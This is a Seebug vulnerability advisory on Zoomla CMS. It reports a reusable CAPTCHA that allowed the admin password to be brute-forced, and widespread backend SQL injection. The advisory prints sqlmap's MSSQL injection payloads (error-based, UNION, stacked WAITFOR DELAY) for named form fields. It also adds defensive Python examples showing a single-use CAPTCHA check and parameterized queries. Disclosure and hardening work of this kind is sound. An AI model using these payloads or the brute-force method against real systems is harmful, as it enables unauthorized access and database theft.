Latest Zoomla CMS (逐浪CMS): from brute force to widespread backend SQL injection, a collection (improper CAPTCHA design)

2014-08-05T00:00:00
ID SSV:94210
Type seebug
Reporter Root
Modified 2014-08-05T00:00:00

Description

Brief description:

As titled.

Details:

There are two problems: 1. the CAPTCHA is designed improperly, so the backend administrator's account password can be brute-forced; 2. there are injection vulnerabilities in many places in the backend (search functions), through which all kinds of sensitive information can be obtained.

Proof of vulnerability:

1. Improper CAPTCHA design

Zoomla backend address: http://demo.zoomla.cn/Admin/login.aspx. At first there was no CAPTCHA, so I tried brute-forcing, but found that it returned a CAPTCHA error. After filling in the CAPTCHA, capturing the request and continuing to brute-force the password field, I found the brute force succeeded.

<img src="https://images.seebug.org/upload/201408/04132927464ad6373e416a22d9d56888f5f78c55.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">

Successfully entered the backend:

<img src="https://images.seebug.org/upload/201408/041330224f0a8cde5b5677af273272070c191a56.jpg" alt="zoomla2.jpg" width="600" onerror="javascript:errimg(this);">
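The flaw above is that a CAPTCHA, once solved, stays valid for the following requests, so a single solve covers an unlimited number of password guesses. The following is an added example (not Zoomla code; the in-memory session store, the demo credential store and the limits are assumptions) of the server-side handling that closes it: the CAPTCHA is bound to one session, consumed on the first verification whether it matches or not, checked before the password is looked at, and backed by a per-account failure counter.

```python
"""Single-use CAPTCHA gate for a login form (added example, not Zoomla code)."""
import secrets
import string
import time

CAPTCHA_TTL_SECONDS = 120   # assumed validity window for one challenge
MAX_FAILED_LOGINS = 5       # assumed lockout threshold per account

# Constructed in-memory stores standing in for the session store / database.
_captchas: dict[str, tuple[str, float]] = {}   # session_id -> (answer, issued_at)
_failures: dict[str, int] = {}                 # username -> consecutive failures
# Hypothetical credential store; a real app compares password hashes.
_users = {"admin": "correct-horse-battery-staple"}


def issue_captcha(session_id: str, length: int = 5) -> str:
    """Generate a fresh CAPTCHA answer for this session, replacing any old one."""
    alphabet = string.ascii_uppercase + string.digits
    answer = "".join(secrets.choice(alphabet) for _ in range(length))
    _captchas[session_id] = (answer, time.monotonic())
    return answer  # a real app renders this as an image instead of returning it


def _consume_captcha(session_id: str, supplied: str) -> bool:
    """Pop the session's CAPTCHA and compare it. It is removed whether or not
    the comparison succeeds, so the same value can never be replayed."""
    entry = _captchas.pop(session_id, None)
    if entry is None:
        return False
    answer, issued_at = entry
    if time.monotonic() - issued_at > CAPTCHA_TTL_SECONDS:
        return False
    return secrets.compare_digest(answer.encode(), supplied.upper().encode())


def login(session_id: str, username: str, password: str, captcha: str) -> str:
    """Return one of 'ok', 'locked', 'captcha_invalid', 'bad_credentials'."""
    if _failures.get(username, 0) >= MAX_FAILED_LOGINS:
        return "locked"
    # The CAPTCHA is checked (and consumed) before the password, so every
    # password guess costs a fresh CAPTCHA solve.
    if not _consume_captcha(session_id, captcha):
        return "captcha_invalid"
    expected = _users.get(username)
    if expected is not None and secrets.compare_digest(expected.encode(), password.encode()):
        _failures.pop(username, None)
        return "ok"
    _failures[username] = _failures.get(username, 0) + 1
    return "bad_credentials"


def replay_demo() -> list[str]:
    """Reproduce the report's scenario: solve one CAPTCHA, then try to reuse it
    for a second password guess, then log in properly with a fresh one."""
    sid = "sess-demo"
    answer = issue_captcha(sid)
    first = login(sid, "admin", "guess1", answer)     # consumes the CAPTCHA
    second = login(sid, "admin", "guess2", answer)    # replay is rejected
    fresh = login(sid, "admin", "correct-horse-battery-staple", issue_captcha(sid))
    return [first, second, fresh]
```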

2. Widespread SQL injection vulnerabilities:

a. First, the search in product management

<img src="https://images.seebug.org/upload/201408/04133131c2e809da93311355458e58647888bf4e.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">

```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' AND 3515=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (3515=3515) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'Cqgx'='Cqgx&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(81)+CHAR(83)+CHAR(66)+CHAR(119)+CHAR(87)+CHAR(74)+CHAR(73)+CHAR(100)+CHAR(89)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113),NULL-- &ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123'; WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4

web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current database: 'demozoomla'
```

sqlmap enumerated 436 tables in the demozoomla database.


b. The visitor reviews (访问评价) search:

<img src="https://images.seebug.org/upload/201408/04133741dd35eeae76fd886ab3b49328743380c0.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">

```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload:
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTTARGET"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTARGUMENT"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__LASTFOCUS"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__VIEWSTATE" [base64 ViewState omitted]
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTitle" 123456%' AND 2825=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (2825=2825) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113))) AND '%'='
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTime" 2014-08
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$btnSeach" ??��������
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06" 10
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07" 1
    ------WebKitFormBoundary5n6dB9dFzpkAYygr--

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload:
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTTARGET"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTARGUMENT"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__LASTFOCUS"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__VIEWSTATE" [base64 ViewState omitted]
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTitle" 123456%' UNION ALL SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+CHAR(100)+CHAR(87)+CHAR(122)+CHAR(70)+CHAR(88)+CHAR(112)+CHAR(69)+CHAR(101)+CHAR(77)+CHAR(72)+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTime" 2014-08
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$btnSeach" ??��������
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06" 10
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07" 1
    ------WebKitFormBoundary5n6dB9dFzpkAYygr--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload:
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTTARGET"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTARGUMENT"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__LASTFOCUS"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__VIEWSTATE" [base64 ViewState omitted]
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTitle" 123456%'; WAITFOR DELAY '0:0:5'--
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTime" 2014-08
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$btnSeach" ??��������
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06" 10
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07" 1
    ------WebKitFormBoundary5n6dB9dFzpkAYygr--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload:
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTTARGET"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTARGUMENT"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__LASTFOCUS"
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__VIEWSTATE" [base64 ViewState omitted]
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTitle" 123456%' WAITFOR DELAY '0:0:5'--
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTime" 2014-08
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$btnSeach" ??��������
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06" 10
    ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07" 1
    ------WebKitFormBoundary5n6dB9dFzpkAYygr--
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current user: 'demozoomla_f'
```

c. The detail records in shop management:

<img src="https://images.seebug.org/upload/201408/041341579bf95dd8b1e7efe9cc884ae21ccf64f3.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201408/04134305443949b94a41607d5750016671646398.jpg" alt="zoomla2.jpg" width="600" onerror="javascript:errimg(this);">

d. The search in yellow-page content management under Enterprise Yellow Pages

<img src="https://images.seebug.org/upload/201408/04134437b7465ce20022e0aca8f9fc5111e3d78b.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">

e. The search in yellow-page tag management under Enterprise Yellow Pages

<img src="https://images.seebug.org/upload/201408/041346325abd131ea8b72820be407828673e3b4b.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">
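Every search listed above (a to e) shows the same root cause in the sqlmap output: the search term (for example ctl00$Content$TxtProjectName or ctl00$Content$txtTitle) is concatenated straight into a WHERE ... LIKE '%...%' clause, and the closing quote in the input ends the string literal. As an added example (not Zoomla code) the following rebuilds that pattern against a constructed in-memory SQLite table, which stands in for the SQL Server 2008 backend (the concatenation defect is the same in both), and puts the parameterized form beside it; the table, rows and function names are assumptions.

```python
"""Vulnerable vs. parameterized LIKE search (added example, not Zoomla code)."""
import sqlite3

# Constructed sample data standing in for a CMS table whose restricted rows
# must never be reachable from the search form.
SAMPLE_ROWS = [
    (1, "Public launch plan", "visible"),
    (2, "Internal budget 2014", "restricted"),
    (3, "Vendor contract draft", "restricted"),
]


def make_db() -> sqlite3.Connection:
    """Create the in-memory stand-in table and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE projects (id INTEGER, title TEXT, visibility TEXT)")
    conn.executemany("INSERT INTO projects VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, keyword: str) -> list[int]:
    """Mirrors the flawed pattern from the report: the raw search term is
    spliced into the SQL text, so a quote in the input rewrites the query."""
    sql = ("SELECT id FROM projects WHERE visibility = 'visible' "
           "AND title LIKE '%" + keyword + "%'")
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn: sqlite3.Connection, keyword: str) -> list[int]:
    """Same query with a bound parameter: the keyword can only ever be data.
    LIKE wildcards in the keyword are escaped so they match literally."""
    escaped = (keyword.replace("\\", "\\\\")
                      .replace("%", "\\%")
                      .replace("_", "\\_"))
    sql = ("SELECT id FROM projects WHERE visibility = 'visible' "
           "AND title LIKE ? ESCAPE '\\'")
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]


def compare(keyword: str) -> tuple[list[int], list[int]]:
    """Run both variants on the same input; returns (vulnerable, parameterized)."""
    conn = make_db()
    try:
        return search_vulnerable(conn, keyword), search_parameterized(conn, keyword)
    finally:
        conn.close()
```

With an ordinary keyword both variants agree; with input shaped like the report's payloads (a closing quote followed by a tautology, then a fragment that re-balances the trailing `%'`) the concatenated query drops the visibility filter and returns the restricted rows, while the parameterized query returns nothing.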